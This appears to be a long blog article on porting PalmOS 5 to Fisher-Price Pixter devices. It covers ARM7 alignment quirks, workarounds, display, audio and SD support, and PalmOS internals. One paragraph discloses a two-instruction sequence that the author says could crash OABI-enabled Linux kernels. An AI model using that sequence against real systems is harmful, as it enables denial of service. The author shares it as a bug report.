The ARM7 core used by Pixter's SoC implements ARM architecture version 4T, which is, in theory, good enough for PalmOS 5.x. You could have guessed this based on the whole story above - I got it to work after all, right? Well, PalmOS ran on a number of ARMv4T processors, but all of them were ARM9 cores or later. The ARM7 CPU design is a bit older and a bit slower, which is not a disaster, and you are probably tired of hearing about the slowness already, but it has a few other quirks which would turn out to become quite a pain when it came time to run my favourite PalmOS game - Warfare, Inc.

As mentioned elsewhere in this increasingly long article, ARMv4T processors can execute instructions in one of two formats. ARM instructions are always 4 bytes long and occur only at memory addresses divisible by 4 (this is called "self-aligned"). Thumb instructions are always 2 bytes long (do not believe anyone who tells you that the BL instruction is 4 bytes long; in ARMv4T, BL is actually two instructions, each of which can be executed independently and each of which is two bytes long), occurring at memory locations divisible by 2 (also self-aligned). These instructions cannot be freely mixed, since the CPU would not know how to interpret the next bytes. Instead, the CPU has an internal method to track which instruction set mode it is in (bit 5 in CPSR, if you are curious). There are a few ways to switch this mode. In ARMv4T, there are precisely two ways. One of them is returning from an exception. This is only used by the OS kernel and not by any normal user code. The second is the BX (branch and exchange) instruction. This instruction takes a register as a parameter and jumps to the address it contains. Since both ARM and Thumb instructions occur at even addresses, the lowest bit of the address register is by definition not meaningful. The CPU uses that bit to decide what mode to switch to - ARM if it is zero, Thumb if it is one. Good so far. Let us analyze all 4 possible cases of the lower 2 bits of the register passed to BX. "01" and "11" are both valid options; both go to Thumb code, either at an address that is even but not divisible by 4, or at an address that is divisible by 4. "00" is also a valid option. This will go to ARM code at an address divisible by 4, as ARM instructions ought to be. Quite clear. It is the last case -- the "10" case -- that is of most interest to us.

ARM architecture reference manual says "If Rm[1:0] == 0b10, the result is UNPREDICTABLE, as branches to non word-aligned addresses are impossible in ARM state." OK, fine. Most often BX is used to return from functions. Clearly the return address should always be valid and this case should not come up. The second-most common use case of BX is to call a function via a function pointer. This should also only use valid pointers with proper alignment and nothing should ever be the matter. Fine. But, there is a third case. Say you are executing in Thumb mode, but wish to call an ARM function. You cannot directly BL to it, since that will leave you in Thumb mode. You could calculate its address and BX to the register containing it, but this is a lot of cycles. There is a third method, and a common one. You BL to a tiny thunk containing a single Thumb instruction: BX PC. Since, when it is read, PC never has the low bit set, and since in Thumb mode it reads as the address of the current instruction plus 4, this will execute a BX with a value with the lowest bit clear and the rest of the bits pointing 4 bytes past this instruction's start (2 bytes past its end). This will cause a switch to ARM mode and continuation of execution at that address in ARM mode. There, one places an ARM B instruction to jump to the desired function. When that function returns (using BX LR), it will jump back to Thumb mode at the call site just past the BL, since the BL had set up the LR register thusly, as is its job. Did you spot a potential issue?

This will all work wonderfully as long as the BX PC instruction is at an address divisible by 4. If it is not, we end up with the above-mentioned "10" case which is, I quote again "UNPREDICTABLE". Does the ARM ARM tell us anything more about this precise case? It does (in the section on the BX instruction)! "Register 15 can be specified for <Rm>. If this is done, R15 is read as normal for Thumb code, that is, it is the address of the BX instruction itself plus 4. If the BX instruction is at a word-aligned address, this results in a branch to the next word, executing in ARM state. However, if the BX instruction is not at a word-aligned address, this means that the results of the instruction are UNPREDICTABLE (because the value read for R15 has bits[1:0]==0b10)." Well, that is pretty clear, this case is unpredictable and nobody should do this. Fine!

The issue is, some PalmOS games that were compiled with an antique version of ARM gcc DO do this. I ran into this while writing the main article on the project, and mentioned the special handling I had to do for it. Somehow, this never broke on any PalmOS 5 device. What gives? It turns out that on ARMv5 and later, whenever the CPU is in ARM mode, the lower 2 bits of PC are forced to zero immediately on any write. So the BX PC at an address that is not divisible by 4 will simply jump to an address 2 less, which is divisible by 4. This seems to be what the old ARM gcc version expected and relied on. However, PalmOS 5 ran on ARMv4T as well. How did it ever work there? Well, it seems that ARM9 CPUs do the same thing. All PalmOS 5 devices on ARMv4T CPUs used ARM9 cores. No PalmOS 5 device ever ran on an ARM7 core. I made the first one! So, what does ARM7 do in this case?

What exactly does ARM7 do with PC[1] in ARM mode?

This investigation took quite a bit of time, since I wanted to make sure I understood the behaviour entirely so that I could emulate it properly in uARM for simplified debugging in the future. I found no information on this anywhere, so this might be the first documentation on the subject. ARM7 CPUs do not force PC [bit 1] to 0 when PC is written. You can write PC using any method you choose with that bit set, and nothing bad will befall you ... at least not immediately. Instruction fetches in ARM mode do not send PC [bits 0..1] on the bus, so instructions will continue to be fetched and execute as expected. If an exception is taken, the value of PC seen by the exception handler will reflect the true value of PC [bit 1], and a return from exception will properly restore it. The value of PC [bit 1] will survive a function call and return as well, causing no ill effects. Reading PC directly will also show the true value of PC [bit 1]. This is where you're likely to hit your first problem. You see, ARM instructions make it rather difficult to load large immediate values into registers, so it is common to load them from a "literal pool" - literally a set of word-sized constants at the end of the current function. Such a load usually takes the form of a PC-relative load instruction, like this: LDR Rx, [PC, #0x124] . Since PC is expected to always be word-aligned, the offsets used also are, producing a word-aligned address whence a word will be loaded. What happens if our PC [bit 1] is set? The produced address will not be word aligned. What happens then? If your CPU has alignment checking enabled, you take an exception due to a misaligned load. And what if your CPU, like the one in Pixter Color's SoC, has no alignment checking ability, or if you simply turned alignment checking off? ARM ARM quoth: "Load single word ARM instructions are architecturally defined to rotate right the word-aligned data transferred by a non word-aligned address one, two or three bytes depending on the value of the two least significant address bits." So, you'll simply load the immediate value you intended to load, except rotated right by 16 bits (swapping the lower and the upper halfwords). I'll let you imagine the havoc that doing this to all constants would cause.
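In code, the quoted rotate-right rule looks something like the sketch below (mine, not rePalm's; mem32() stands in for an aligned bus read). With PC [bit 1] set, every literal-pool address has its low two bits equal to 2, so every loaded "constant" comes back rotated by 16 bits.

    #include <stdint.h>

    extern uint32_t mem32(uint32_t alignedAddr);    /* stand-in for a real bus read */

    static uint32_t ror32(uint32_t v, unsigned bits)
    {
        bits &= 31;
        return bits ? (v >> bits) | (v << (32 - bits)) : v;
    }

    /* What an ARM LDR returns for a non-word-aligned address when alignment
     * checking is off: the aligned word, rotated right by 8 bits per low
     * address bit. For addr & 3 == 2 that is a 16-bit rotation - the two
     * halfwords of the constant come back swapped. */
    static uint32_t ldrUnaligned(uint32_t addr)
    {
        return ror32(mem32(addr & ~3u), 8 * (addr & 3));
    }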

Curiously, there is another place this can cause issues. A typical way to call an OS kernel is a SWI instruction, which, in ARM mode, encodes a 24-bit immediate in its lower 24 bits. A kernel would usually read the immediate to figure out what the requested syscall number is. Since, in the exception handler, LR is expected to point just past the SWI instruction, a typical way to get this immediate is LDR R0, [LR, #-4]; BIC R0, #0xFF000000 . See the issue here? If PC was misaligned, your kernel would have just taken an alignment fault, or (if alignment checking is off) simply read the wrong value. A kernel aware of this quirk would instead do something like this: BIC R0, LR, #3; LDR R0, [R0, #-4]; BIC R0, #0xFF000000 . Fun story: looking at what Linux does, it looks like a possible user-space DoS on Linux in just two instructions. Would that be a record? If the kernel was configured to support OABI (exclusively or together with EABI), the following two-instruction binary will simply crash the kernel if the core has alignment checking: SUB PC, PC, #2; SWI 0 . I am not sure how common such configs are, but someone should maybe fix that?

But OK, back to my favourite game. Since ARM code execution is unimpeded by PC [bit 1], the faulty code crashes after an arbitrary delay following PC [bit 1] being set, or maybe does not crash at all, but malfunctions. If I had alignment checking, I could detect the most likely cause of crash (an unaligned literal load) and fix it. Lacking that, what could I do? I decided on a complex, partial, and heuristic-heavy solution. To call into ARM-native code, PalmOS applications use an OsCall called PceNativeCall. It gets a function pointer to jump to in native ARM mode, and a parameter to pass to the code. I patched this function with my own wrapper that does the following: First, determine which memory heap the code pointer is in. Second, manually walk the heap structures to find which memory chunk the pointer is in. Third, assume that the entire memory chunk is ARM code and apply the heuristic to it. The heuristic produces no false positives or negatives across all the games I tested, so I am satisfied with it. It is this: (1) a valid Thumb BL at a proper 2-byte boundary pointing to somewhere inside the chunk at a 2- but not 4-byte boundary, (2) a BX PC at that location, (3) the BX PC is followed by a valid ARM B with a target somewhere inside the chunk, and (4) the target instruction is unconditional, making it a likely first instruction in a valid function.
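A sketch of that heuristic in C follows. The instruction encodings are architectural (a Thumb BX PC is 0x4778, an ARMv4T Thumb BL is the halfword pair 0xF000+hi / 0xF800+lo, an unconditional ARM B has 0xEA in its top byte); everything else - the names and the chunk bounds checking that would surround this - is my own illustration.

    #include <stdbool.h>
    #include <stdint.h>

    /* Step 1: is this halfword pair a valid ARMv4T Thumb BL, and if so,
     * where does it go? */
    static bool thumbBlTarget(const uint16_t *bl, uint32_t *dstOut)
    {
        int32_t off;

        if ((bl[0] & 0xf800) != 0xf000 || (bl[1] & 0xf800) != 0xf800)
            return false;
        off = ((int32_t)((uint32_t)(bl[0] & 0x7ff) << 21) >> 9) |   /* sign-extended hi part */
              ((bl[1] & 0x7ff) << 1);                               /* lo part */
        *dstOut = (uint32_t)(uintptr_t)bl + 4 + off;
        return true;
    }

    /* Steps 2..4: the target is 2- but not 4-byte aligned, holds a BX PC,
     * and is followed by an unconditional ARM B. */
    static bool looksLikeBrokenThunk(const uint16_t *bl)
    {
        uint32_t dst;

        if (!thumbBlTarget(bl, &dst) || (dst & 3) != 2)
            return false;
        if (*(const uint16_t *)(uintptr_t)dst != 0x4778)            /* BX PC */
            return false;
        /* the ARM B lives at dst + 2, which is word-aligned */
        return (*(const uint32_t *)(uintptr_t)(dst + 2) & 0xff000000) == 0xea000000;
    }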

OK, so, say I find the problematic BX PC. What now? It is not like I can fix it. To fix it requires two bytes of extra space that I do not have, and editing of all the callsites. Instead, I simply replace the BX PC with an invalid instruction in a special format. My kernel has a handler for the invalid instruction trap that checks for Thumb-mode execution of that exact instruction. It will correctly adjust PC and return in ARM mode to the ARM B instruction, allowing it to continue with PC [bit 1] properly cleared. This does mean that (1) I am editing the game binary in RAM and some game might detect this and get upset, and (2) depending on how often this callsite is called, a whole lot of exceptions might be taken, costing a lot of performance. The first case is simple - seemingly no games get upset, because they usually do their self-checking before calling the code. The second case is addressed by making the handler as simple and light as possible, minimizing the penalty. This is the best I can do, and it works! Since the issue is found in the ARM7TDMI core, I named my hack to work around it LEG7IMDT, of course.
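For flavour, here is roughly what such a trap handler has to do, as a hedged C sketch. The magic encoding and the exception-entry conventions (how the kernel presents the trapped PC and PSR) are simplified stand-ins, not my kernel's real ones.

    #include <stdbool.h>
    #include <stdint.h>

    #define LEG7IMDT_MAGIC 0xde77u  /* made-up encoding in Thumb's undefined space */

    /* trappedPc is the address of the offending (formerly BX PC) instruction;
     * psr is the saved status register, whose bit 5 is the Thumb bit. */
    static bool undefHandler(uint32_t *trappedPc, uint32_t *psr)
    {
        if (!(*psr & 0x20))                     /* not Thumb mode: not ours */
            return false;
        if (*(const uint16_t *)(uintptr_t)*trappedPc != LEG7IMDT_MAGIC)
            return false;
        *trappedPc = (*trappedPc + 4) & ~3u;    /* resume at the ARM B, aligned */
        *psr &= ~0x20u;                         /* ...in ARM mode, PC[1] clear */
        return true;                            /* handled */
    }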

Pixter Multimedia

The last generation of Pixter was the "Pixter Multimedia". This one was even fancier - it had some buttons (a directional pad and A/B buttons) and a better SoC: the Sharp LH79524. It also supported some fancier multimedia game carts, some featuring rudimentary video playback. Inside, it sported a real DAC (the TLV320DAC26), connected by I2S to the SoC. There were also 4 whole megabytes of SDRAM in the device. Up front, and most noticeable of all, was the TFT screen. Still 160x160, but now with a better contrast ratio than the Pixter Color's STN screen's 1:2. Of course I wanted to support this one as well. What would that take?

The SoC uses the same ARM7 core, but now in a much better configuration: it has an MMU and 8KB of cache. The TCM is gone, however. This is a worthy trade. With an MMU, a number of things get better: NULL pointers can be caught, real memory protection is possible for the storage heap, and a simpler solution to the ARM7 quirks might be possible instead of LEG7IMDT. With a cache, much of the memory latency can be hidden for tasks with a small working set. Overall, this device performs significantly better!

Audio support was actually rather simple. Once I figured out how the SPI interface of the codec was wired to the SoC (it was bit-banged using some GPIOs), it was simply a matter of configuring the DMA for the data and configuring the DAC for the proper sample rate. I made it build-time-configurable in the source, but settled on 44.1KHz - a perfectly good sample rate. The codec supports driving a single speaker (as is present in the Pixter Multimedia) or a set of headphones in glorious full stereo. As I designed rePalm to make supporting new hardware easy, it took only a few hours of work to hook up audio support and hear it work. This device is fast enough to play uncompressed audio and even do so while a game is running, making playing Warfare, Inc even more fun, with the units calling out "on my way, sir!" when you direct them somewhere. As in Pixter Color, I hooked up the battery sense to the OS (here the scale was 0.27). There is also a volume knob on the side of Pixter Multimedia. As the DAC has no analog "gain" input, I was not quite sure where it could possibly be hooked up to work. The mystery was solved after some investigation. It is an analog input to the SoC's ADC, nothing more. It is up to software to do anything with this information. I decided to save this for later, but maybe I'll convert it to a jog-wheel-like thing. Anyways, simple game soundbites and uncompressed audio were not the extent of my aspirations -- I wanted real MP3 playback from SD card to work!

Everything I said about SD card support on Pixter Color still held here - I was bit-banging SPI to talk to the card. The SoC in Pixter Multimedia has a different clock tree, and I played around with a lot of options, finally settling on a rather significant CPU overclock of 102MHz (the documented max is 75MHz) while keeping the AHB speed at 51MHz. This provided stability and just barely enough cycles to decode mono 96Kbps MP3s. Higher clock rates would allow higher quality music, but not all of the Pixter Multimedia units I tested could clock higher than 110MHz.

The Pixter Multimedia display proved to be a pain point, however. It is indeed 160x160, but for some reason stock Pixter software was configuring it for 162x160. It took me very little time to figure out why - the display eats the first two columns of data. This happens despite any configuration change: it does not matter if you adjust the HBP or HFP or HSYNC length. Unfortunately, losing the FIRST pixels of a row is very, very bad for us! Why? Many parts of PalmOS assume that every display line begins at a 2-byte boundary. My blitter does as well, for efficiency. There is no assumption that every line follows the previous one in memory, so in theory we can simply have a 160x160 display with a 162x160 framebuffer in memory, and claim that the framebuffer starts 2 pixels in. Will it work? Let's math! The SoC hardware forces the display data to start at a 4-byte boundary. At 16bpp, two pixels are 4 bytes, so an address two pixels into a line is 4-byte aligned -- a superset of being 2-byte aligned. Good. At 8bpp, two pixels are 2 bytes, so an address two pixels into a line is 2-byte aligned - good enough. Things begin to fall apart at 4bpp and below. At 4bpp, two pixels are a single byte and the blitter will be quite unhappy at a line not starting at a 2-byte boundary. At 2 and 1 bpp, the line does not even start at a byte boundary. No good! What could I do?

Had I had no MMU, the game would be over right there, but I did have one! I decided to do the same thing I had done before for another reason. The short of it is: create a fake framebuffer, aligned as the OS wants it. Protect it using the MMU. Anytime a write is attempted, take a fault, unprotect it, and start a 60Hz timer to convert the data to the proper format and alignment and transfer it to the real framebuffer. After a few such copies, re-protect the original framebuffer and disable the timer. In turn, that allows for fast refreshes while drawing is ongoing and stops the CPU waste when this is no longer needed. This allows the 1/2/4bpp modes to work and only wastes CPU on drawing when actual drawing is ongoing. I wrote the transfer funcs in assembly for speed. This also allows us to use 16bpp mode. You'll recall that I mentioned that these Sharp SoCs use the idiotic XRGB1555 mode, while PalmOS needs and assumes the common-and-sane RGB565. Well, now that I had an ability to "convert" data on each draw, why not support 16bpp as well? I did and it is glorious! Photo-viewing apps work now, even if only using 32768 colors.
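The 16bpp conversion itself is simple; a sketch of a per-line converter follows (my names, not rePalm's actual assembly). Green loses its extra bit, which is why only 32768 colors survive.

    #include <stdint.h>

    /* Convert one line of the fake RGB565 framebuffer (what PalmOS draws
     * into) to the XRGB1555 format the Sharp SoC scans out. */
    static void lineRgb565ToXrgb1555(uint16_t *dst, const uint16_t *src, unsigned nPx)
    {
        while (nPx--) {
            uint16_t px = *src++;
            uint16_t r = (px >> 11) & 0x1f;
            uint16_t g = (px >> 6) & 0x1f;  /* drop green's lowest (6th) bit */
            uint16_t b = px & 0x1f;

            *dst++ = (r << 10) | (g << 5) | b;
        }
    }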

As foreshadowed earlier, LEG7IMDT is not needed on Pixter Multimedia. Any sane code running with PC [bit 1] set would either run fine to completion or hit an alignment fault when it attempted to load an immediate from the literal pool. My alignment fault handler simply checks if the CPU was in ARM mode with PC [bit 1] set, clears it, and returns. If this fixes the issue - good. If not, we trap again and this time it is fatal, since PC [bit 1] being set was clearly not the issue. This is indeed simpler than walking memory heaps and patching random executables live.
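As a sketch (again with simplified exception-entry conventions standing in for the real ones), the whole workaround reduces to a few lines:

    #include <stdbool.h>
    #include <stdint.h>

    /* On an alignment fault: if we were in ARM mode with PC[1] set, clear
     * the stray bit and retry the instruction. A second fault at the same
     * spot means the misalignment was real, and thus fatal. */
    static bool alignFaultHandler(uint32_t *faultPc, uint32_t psr)
    {
        if (!(psr & 0x20) && (*faultPc & 2)) {  /* ARM mode, PC[1] set */
            *faultPc &= ~2u;
            return true;                        /* retry */
        }
        return false;                           /* genuine fault */
    }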

Some More Pixter Polish

Pixter Multimedia showing a simple white-on-black message that this is the wrong device to boot this cart

Since both Pixter Color and Pixter Multimedia use the same cart slot, the same cart can be used in both, hardware-wise. But since the rePalm kernel builds rather differently for MMU and MMU-less systems, I did not want to try to make a universal build. Instead, you can use the self-update mechanism to flash one of the two images to switch between them. Of course, if you only have a Pixter Color, you would not want to flash the Pixter Multimedia image, since you'd then be unable to boot to flash back. I did want to be a bit more user-friendly. Luckily, long ago I added a capability to run some code very early in rePalm boot. On Pixter, I used it to check the SoC type before boot. What good is that? If it does not match the current build, I can use rePalm's simple fixed-width character renderer on the framebuffer still enabled from Pixter's OS's boot and show a message. Here you can see what it looks like.

At some point during the project, I saw a weird Pixter Color. It seemed to have a much better screen than others. It also did not boot my Pixter Color image. To be more precise, it booted fine, based on the serial console, but the display was off. Some investigation revealed that there was a small production run of Pixter Color devices with the Pixter Multimedia's TFT screen. I changed my code to detect the screen type (based on how Pixter's OS had set it up) and handle both. The good news is that the TFT display on Pixter Color can display the full 4096-color palette that 12 bits per pixel would allow, rather than the 3375 colors the STN could. There was bad news too, though. Being the same display as Pixter Multimedia's, it still ate the first two columns of pixels. Pixter Color had not yet sprouted an MMU, so my old tricks would not work. Initially, I simply disabled the 1/2/4 bpp modes. This did not seem to break any applications, but it confused many, since very few actually check for errors when they call WinScreenMode to set the screen depth. I decided that a low-performing solution is better than one that confuses apps, so I added a 60Hz interrupt that copies the data in the proper format from a fake framebuffer to the real one. Basically, this is the same as what I did for Pixter Multimedia, but without the ability to stop doing it when the display stops being changed by the app. I'd estimate the performance cost of this to be around 20% of Pixter Color's CPU budget. Luckily, when running at 8bpp, this is not an issue. I then did the same thing to enable 16bpp on both the STN and TFT displays. The cost is immense (30% CPU on TFT, 46% on STN due to needing to apply the STN correction curves). Due to this, I have the device boot in 8bpp mode, which has color and performs well, but if any app requests 16bpp, it is available. After some more thought about how cruel it is to steal 46% of an already slow CPU, I changed this to a 30Hz interrupt, halving the cost.

Pixter Multimedia showing the 'Buttons' control panel with icons matching Pixter's silkscreened buttons

I wanted to make good use of ALL the silkscreened buttons under the display, not just the three I had assigned before. I mapped them all to a purpose, and even took the time to draw pixel-perfect icons for them to integrate into the Buttons Prefs Panel on both devices. The mapping is the same on both devices, even though the button spacing is not, which required individual silkscreen resource files. The first button toggles on-screen writing, and the next 4 act like the normal application buttons on Palm devices. The next one (that looks like an explosion) opens the menu. The one after that, which looks like a magic wand, opens the contrast adjustment dialog. Why? The original Pixter OS used it for that and I desired some consistency. The one after (the folder) brings up the find dialog. And, of course, the home icon opens the app launcher. Overall sane, I think.

Pixter Results

This is the first primary-battery-powered color PalmOS device. This is the first primary-battery-powered PalmOS 5 device. Pixter Color is also the worst-performing PalmOS device ever. But it does work... There are a lot of photos and videos in the rePalm photo album linked at the top of this page.

I did some benchmarks and found that Pixter Multimedia performs approximately on par with a Palm Tungsten T. Pixter Color ... looks cute trying, but the benchmark results are comical -- it is 6% as fast as a T|T. But for basic PIM and many games this is plenty. Warfare Inc works! What more could you ask for? To download the latest update images, click here . You can use them to flash boards you make or to update boards you got from me.

Nov 2, 2025 - summary of what you missed

I have made builds for the Pimoroni Presto and the DEFCON32 badge, and worked on PalmCard - a replacement memory card for the classic Palm Pilot that uses an RP2040 to run rePalm and makes a terminal out of the Palm. Lately I've been working on supporting the Fisher-Price Pixter Color. All of this can be seen in the photo album. Future updates will be more detailed, but I am too lazy to write about the last few years of development here, since it really was mostly just new device support and bug fixes. Someone who is not me also did some work on rePalm - there is now a working Nintendo DS port. I helped only a little, most of the work was not mine, and this is awesome!

The original article about the start of the project

PalmOS Architecture (and a bit of history)

History

PalmOS before 5.4 kept all data in RAM, in databases. These came in two types: record databases (what you'd imagine them to be) and resource databases (similar to MacOS classic resources). Each database had a type and a creator ID, each a 32-bit integer, customarily with each 8-bit piece being an ASCII char. Most commonly, an application would create databases with their creator ID set to its own. Certain types also had meaning; for example, appl was an application and panl was a preference panel.
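For illustration, such IDs are just four chars packed big-endian into a word; a sketch of the usual way to write them in C (the macro name is mine):

    #include <stdint.h>

    /* Pack four ASCII chars into a 32-bit PalmOS type/creator ID. */
    #define FOURCC(a, b, c, d)  (((uint32_t)(a) << 24) | ((uint32_t)(b) << 16) | \
                                 ((uint32_t)(c) << 8) | (uint32_t)(d))

    /* e.g. FOURCC('a','p','p','l') is the type of an application database */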

PalmOS started out on Motorola 68k processors and ran on them from first development all the way to version 4.x. For version 5, Palm Inc chose to switch to ARM processors, as they allowed a lot more speed (which is always a plus). But what to do about all the software? Lots of PalmOS apps were written for OS 4.x and compiled for the m68k processor. Palm Inc introduced PACE - the Palm Application Compatibility Extension. PACE intercepted the OsCall SysAppLaunch (and a number of others) and emulated the m68k processor, allowing all the old software to run. When m68k apps called an OsCall, PACE would translate the parameters and call the ARM Native OsCall. This meant that while the app's logic was running in emulation, all OsCalls were native ARM and fast. Combine this with the fact that PalmOS 4.x devices usually ran at 33MHz while PalmOS 5.x devices usually ran at hundreds, and there was almost no slowdown; most old apps compiled for PalmOS 4.x ran at a perfectly good speed. It was even good enough for Palm Inc, since most built-in apps (like calendar and contacts) were still m68k apps, not ARM. There was also PalmOS 6.x (Cobalt), but it never really saw the light of day and is beyond the scope of this document.

Palm Inc never documented how to write full Native ARM applications on PalmOS 5.x. It was possible, but not documented. The best official way to get the full speed of the new ARM processors was to use the OsCall PceNativeCall to jump into a small bit of native ARM code that Palm Inc called "ARMlet"s and later "PNOlet"s. Palm said that only the hottest pieces of code should be treated this way, and it was rather hard to call OsCalls from these bits of native ARM code (you had to call back into PACE, which would marshal the parameters for the native API, and then call it). The ways to call the real Native OsCalls were also not documented.

PalmOS 5.x kept a lot of the design of PalmOS 4.x, including the shared heap, lack of protected memory, and lack of proper documented multithreading. A new thing was that PalmOS 5.x supported loadable modules. In fact, every Native ARM application or library in PalmOS 5.x is a module. Each module has a module ID, which is required to be system-unique and exist in the range of 0..1023. This is probably why Palm Inc never documented how to produce full Native applications - they could never allow more than 1024 of them to exist.

PalmOS licensees (Sony, Handspring, etc.) got the sources to the OS and all of this knowledge, of course. They were able to customize the OS as needed and then ship it, but the architecture was always mostly the same. This also aids us a lot.

Modules? Libraries? DALs? Drivers?

The kernel of the OS, memory management, most of the drivers, and low level CPU wrangling is done by the DAL. The DAL (Module ID 0) exports about 200 OsCalls, give or take based on the PalmOS version. These are low level things like getting battery state, raw access to screen drawing primitives, module loading and unloading, memory map management, interrupt management, etc. Basically, these are functions that no user-facing app would ever need to use. On top of the DAL lives Boot. Boot (Module ID 1) provides a lot of the lower-level user-facing OsCalls. Implemented here are things like the DataManager, MemoryManager, AlarmManager, ExchangeManager, BitmapManager, and WindowManager. Feel free to refer to the PalmOS SDK for details on all of those. On top of Boot lives UI. UI (Module ID 2) provides all of the UI primitives to the user. These are things like controls (buttons, sliders, etc), forms, menus, tables, and so on. These three modules together make up the core of PalmOS. You could, in fact, almost boot a ROM containing just these three files.

These first three modules are actually somewhat special, being the core of the OS. They are always loaded, and their exported functions are always accessible via a special shortcut. For modules 0, 1, and 2, you can call exported function number N by executing these two instructions: LDR R12, [R9, #-4 * (module_ID + 1)]; LDR PC, [R12, #4 * func_no] . This shortcut exists for easy calls to OsCalls by native modules and only works because these modules are always loaded. This is not a general rule, and this will NOT work for any other modules. You might ask if one can also write to these tables of function pointers to replace them. Yes, yes you can; this was often done by what were called "hacks", and it is also liberally used by the OS itself (though not via direct writes, but via an OsCall: SysPatchEntry ).
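Rendered as C, the shortcut implies a layout like the sketch below, under my assumption that R9 serves as a globals pointer; the names are mine, not PalmOS's.

    typedef void (*OsCallFunc)(void);

    /* Per the two instructions above: the pointer to module m's export
     * table lives at R9 - 4 * (m + 1), and entry n of that table is the
     * function's address. Only valid for modules 0 (DAL), 1 (Boot), 2 (UI). */
    static OsCallFunc getOsCall(void *r9, unsigned moduleId, unsigned funcNo)
    {
        OsCallFunc **tables = (OsCallFunc **)r9;

        return tables[-(int)(moduleId + 1)][funcNo];
    }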

PalmOS lacks any memory protection; any user code can access hardware. PalmOS actually uses this - things like SD card drivers and drivers for other peripherals are usually separate modules and not part of the DAL. The Boot module will load all PalmOS resource databases of certain types at boot, allowing them to initialize. An incomplete list of these types is: libs (slot driver), libf (filesystem driver), vdrv (serial port driver), aext (system extension), aexo (OEM extension). These things being separate is actually very convenient, since it means that they can be easily removed/replaced. There are of course corner cases, since PalmOS developers never anticipated this. For example, if NO serial drivers are loaded, the OS will crash, as it never expected this. Luckily, this is also easy to work around.

Anytime a module is loaded, the entry point is called with a special code, and the module is free to initialize, set up hardware, etc. When it is unloaded, it gets another code, and can deinitialize. There is another special code modules can get, and that one comes from PACE. If you remember, I said that PACE marshals parameters from m68k apps to OsCalls and back, but PACE cannot possibly know about the parameters that a random native library takes, so the marshalling there must be done by the library itself. This special code is used to tell the library to read the parameters from the emulated m68k stack, process them, and put the result into the emulated m68k registers (PACE exports functions to actually manage the emulated state, so the libraries do not need to know of its insides).

Towards the first unauthorized PalmOS port

So what's so hard?

As I mentioned, none of the native API of PalmOS 5.x was ever documented. There was a small number of people who figured out some parts of it, but nobody really got it all, or even close to it - to start with, because large parts are not useful to an app developer, and thus attracted no interest. This is a problem, however, if one wants to make a new device. So I had to actually do a lot of reverse engineering for this project - a lot of boring reverse engineering of very boring APIs that I still had to implement. Oh, and I needed a kernel, and actual hardware to run on.

ROM formats are hard

To start with, I wrote a tool to split apart and put back together working PalmOS ROM images. The format is rather convoluted, and changed between versions, but after a lot of work the "splitrom" tool can now successfully split a PalmOS ROM from pre-release pre-v1.0 PalmOS devices all the way to the PalmOS 6.0 Cobalt ROMs. The "mkrom" tool can now produce valid PalmOS 5.x images - I never bothered to actually make it produce other versions, as I did not need to. At this point I took a detour from the project to collect PalmOS ROMs. I now have one from almost every device and prototype. I'll share them with the world later. I tested all this by pulling apart a T|T3 ROM, replacing some files, putting it back together, and reflashing my T|T3. It booted! Cool!

So write a DAL and you're done!

I had no hardware to test on, no kernel to use, and a lot more "maybe"s than I was willing to live with, so it was time for action. The quickest way I could think of to try it was to use a real ARM processor and an existing kernel - Linux. Since my desktop uses an x86 processor and not ARM, qemu was used. I wrote a rudimentary DAL that simply logged any function called and then crashed on purpose. At boot, it did the same as PalmOS's DAL does: load Boot and, in a new thread, call the PalmOSMain OsCall. I then wrote a simple "runner" app that used mmap() to map an area of memory at a particular location backed by "rom.bin" and another by "ram.bin" and tried to boot it. I got some logged messages and a crash, as expected. Cool! I guess the concept could work. So, what is the minimum number of functions my DAL needs to boot? Turns out that most of them! Sad day...
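The runner's core trick is just mmap() with MAP_FIXED; a minimal sketch of the idea (the addresses and sizes are placeholders, not the real memory map):

    #include <fcntl.h>
    #include <stddef.h>
    #include <sys/mman.h>

    /* Back a fixed virtual address range with a file, writable and
     * executable, so the ROM and RAM images can be used in place. */
    static void *mapAt(const char *path, void *where, size_t len)
    {
        int fd = open(path, O_RDWR);

        if (fd < 0)
            return NULL;
        return mmap(where, len, PROT_READ | PROT_WRITE | PROT_EXEC,
                    MAP_SHARED | MAP_FIXED, fd, 0);
    }

    /* mapAt("rom.bin", (void *)0x10000000, romSize);
     * mapAt("ram.bin", (void *)0x20000000, ramSize);  */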

Minimal DAL

It took months, but I got most of the DAL implemented, and it ran inside my "runner" inside qemu. It was a very scary setup. Since it was all a userspace app under Linux, I had to call back out to the "runner" to request things like thread creation, etc. It was a mess. Current rePalm code still supports this mode, but I do not expect to use it much, for a variety of reasons. To start with, the Linux kernel lacks some APIs that PalmOS simply needs, for example the ability to disable and re-enable task switching. Yup... PalmOS sometimes asks for preemption to be disabled. Linux lacks that ability. PalmOS also needs the ability to remotely pause and resume a thread, without the thread's consent. The pthreads library lacks such an ability as well. I hacked together some hacks using ptrace, but it was a mess. Fun story: since my machine is multi-core, and I never set any affinities, this was the first time ever that PalmOS ran on a multi-core device. I did not realize it till much later, but that is kind of cool, no?

Drawing is hard

There was one problem. For some reason, things like drawing lines, rectangles, circles, and bitmaps were all part of the DAL. Now, it is not hard to draw a line, but things like "draw a rounded rectangle with a foreground color of X and a background color of Y, using drawing mode 'mask' on this canvas" or "draw this compressed 16-bit full-color 144ppi image on this 4-bits-per-pixel 108ppi canvas with dithering, respecting transparency colors, and using 'invert' mode" or even "print the string 'Preferences' with background color X, foreground Y, text color Z, dotted-underlined, using this low-density font on this 1.5 density canvas" get convoluted quickly. And yes, the DAL is expected to handle all of this. Oh, and none of this was ever documented, of course! This was a nightmare. At first I treated all drawing functions as NOPs and just logged the drawn text to know how far my boot had gotten. This allowed me to implement many of the other OsCalls that the DAL must provide, but eventually I had to face having to draw. My first approach was to just implement things myself, based on function names and some reverse engineering. This approach failed quickly - the matrix of possibilities was simply too large. There are 8 drawing modes, 3 supported densities, 4 image compression formats, 5 supported color depths, and two font formats. It was not possible to think of everything, especially with no way to be sure I had it right. I am not sure if some of these modes ever got exercised by any software in existence at all, but it did not matter - it had to be pixel exact! What to do?

Theft is a form of flattery, right?

I decided on a stopgap measure. I disassembled the Zire72 DAL. And I copied each of the necessary functions, and all the functions they called, and all of the functions those functions called, and so on. I then cleaned up their direct references to the Zire72 DAL's globals, and to each other, and I stuck it all into a giant "drawing.S" file. It was over 30,000 lines long, and I mostly had no idea how it worked. Or if it worked...

